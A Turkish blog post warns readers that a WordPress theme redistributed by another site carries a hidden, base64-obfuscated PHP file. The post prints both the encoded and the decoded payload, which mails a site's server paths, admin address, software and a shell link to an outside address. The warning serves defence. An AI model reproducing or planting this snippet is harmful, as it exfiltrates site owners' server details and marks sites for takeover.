25 Nisan 2019
Home » Hayattan Kesitler » Geçmiş olsun Suat!

Geçmiş olsun Suat!

İnternet üzerinde WordPress ilk geçtiğim ilk kullandığım dönemlerde yeni tanıştığım cana yakın biri Suat TÜRKMEN arkadaşımın teması hakkında size bilgi vermek istiyorum.Dün kendi sitesine girdim. Bir makalesi dikkatimi çekti! Makalesinde kendi emeğiyle kendi bilgileri doğrultusunda hazırladığı WordPress temasını başka bir sitede düzeltilerek şifreli kodların olduğunu anlatmış. Sitenin adreside www.wptr.net bu siteden tema indirmede dikkatli olun arkadaşlar. Bana kalırsa hiçbir temasını indirmeyin. Nedenide şu;

Fazla bilmiş kişi abc.txt diye bir dosya atmış Suat arkadaşımın temasına.Temadaki görüntüde

header.php harici, headers.php adıyla bir dosya daha eklenmiş ve temel dosyalara ilişkilendirilip şifrelenmiş.  Resimde de dosya ve klasörler oluşturmaya başlayıp, dosya izinleriyle, yetkilerle oynamışlar. Casus dosyaların içinde şifrelenmiş şekilde şu satırlar var.

Şifrelenmiş kod ise;

[php]<? <a href="http://www.php.net/eval">eval</a>(<a href="http://www.php.net/base64_decode">base64_decode</a>("JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw=="));?>[/php]
Suat arkadaşımızın hazırladığı öz temasında ise şifrelenmemiş şeklide aşşağıdaki kod.
[php]z&#65533;�r�^$kime="[email protected]"; $baslik="WordPresS Tema Sw Avcisi V3.0"; $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER[‘DOCUMENT_ROOT’]."rn"; $EL_MuHaMMeD.="Server Admin : ".$_SERVER[‘SERVER_ADMIN’]."rn"; $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER[‘SERVER_SOFTWARE’]."rn"; $EL_MuHaMMeD.="Shell Link : http://".$_SERVER[‘SERVER_NAME’].$_SERVER[‘PHP_SELF’]."rn"; $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER[‘HTTP_HOST’]."rn"; <a href="http://www.php.net/mail">mail</a>($kime, $baslik, $EL_MuHaMMeD);[/php]
Size tavsitem arkadaşlar Bu siteden, yani http://www.wptr.net isimli siteden indirdiğiniz her tema bunun gibidir. Dikkatli olun ve benim temam dahil tüm temaları resmi sitelerinden indirmeye dikkat edin.
Bizi bilgilendirdiğin için teşekkürler Suat.Yapacağın birşeyin olmadığını biliyorum. Sana tavsiyem artık yaptığın temaları kendin kullan. Yeni tema yazdığında eski temanı emeğin karşılığı olarak satmanı tavsiye ederim. Sen ve sen gibilerin başı çok yanar.Tekrar geçmiş olsun. Başarılar Suat..

Hakkında Emre

Galatasaraylı Bir Michael Jackson Hayranı... 1996 yılında kasa montajı ile başladığı bilgisayar serüveni onu sırasıyla notebook tamiratı, web sitesi tasarım ve yönetimi, editörlük ve danışmanlık hizmetlerine kadar getirdi, hala kıramadığı firmalarla site çalışmalarına devam etmesine karşın, sosyal medya üzerine odaklı.

Yorum yok

  1. Kod Açıklaması : Arkadaşlar Mail Yollunu kullanıp Sitenizin Adını admin bilgilerini Sunucu Versiyonunu Dahil Bütün Bilgilerinizi Çekiyor Dikkat Edin İndirmeyin Sitenizin Güvenliği için.. Bu arada Notu Yazan Emre Yildirıma Teşekür Ediyorum..

  2. Uyarı için teşekkürler abi.

Bir Cevap Yazın

error: